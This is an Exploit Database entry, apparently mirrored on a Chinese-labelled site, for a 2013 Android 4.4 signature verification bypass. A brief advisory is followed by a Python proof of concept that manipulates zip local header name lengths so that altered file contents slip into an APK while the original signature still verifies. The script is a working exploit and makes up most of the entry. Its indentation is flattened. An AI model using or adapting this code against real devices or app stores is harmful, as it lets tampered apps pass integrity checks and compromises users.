Google Android – Signature Verification Security Bypass

• Exploit Database
• 21 阅读

• 作者： Jay Freeman
  日期： 2013-11-04
• 类别：

  • remote
  平台：

  • android
• 来源：https://www.exploit-db.com/exploits/38821/

• source: https://www.securityfocus.com/bid/63547/info
  
  Google Android is prone to a security-bypass vulnerability.
  
  Attackers can exploit this issue to bypass certain security restrictions to perform unauthorized actions. This may aid in further attacks.
  
  Android 4.4 is vulnerable; other versions may also be affected. 
  
  #!/usr/bin/python
  
  import zipfile
  import struct
  import sys
  
  # usage: ./pocB.py new.apk old.apk file data
  zout = zipfile.ZipFile(sys.argv[1], "w")
  zin = zipfile.ZipFile(sys.argv[2], "r")
  replace = sys.argv[3]
  new = open(sys.argv[4], 'r').read()
  
  fp = zout.fp
  
  for name in zin.namelist():
  old = zin.read(name)
  if name != replace:
  zout.writestr(name, old, zipfile.ZIP_DEFLATED)
  else:
  assert len(new) <= len(old)
  
  # write header, old data, and record offset
  zout.writestr(name, old, zipfile.ZIP_STORED)
  offset = fp.tell()
  
  # return to name length, set to skip old data
  fp.seek(-len(old) -len(name) -4, 1)
  fp.write(struct.pack('<h', len(name) + len(old)))
  
  # after old data, write new data \0 padded
  fp.seek(offset)
  fp.write(new)
  fp.write('\0' * (len(old) - len(new)))
  
  zout.close()
  zin.close()